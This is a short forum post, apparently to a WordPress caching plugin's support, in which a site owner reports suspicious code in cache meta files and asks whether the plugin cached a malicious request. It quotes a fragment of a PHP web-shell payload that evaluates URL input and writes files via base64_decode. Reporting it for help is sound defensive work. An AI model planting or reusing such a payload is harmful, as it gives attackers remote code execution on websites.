Hi,
I had some potentially malicious code in files like this(name changed):
wp-content/cache/supercache/www.example.org/meta-wp-cache-www.example.org12ef834fsaf32r23f43gsdf95.php
here is the sample:
@eval($_GET[%27fuck%27]);&fuck=fputs(fopen(base64_decode(
@donncha has written some time ago that these PHP files are generated off the website. What kind of requests are they generated from? Are they error logs generated from debugging tab – there is a link to non-existing php file with hashed name?
I looked into other files and database and they seem clean. Is it possible that the plugin has cached a malicious request?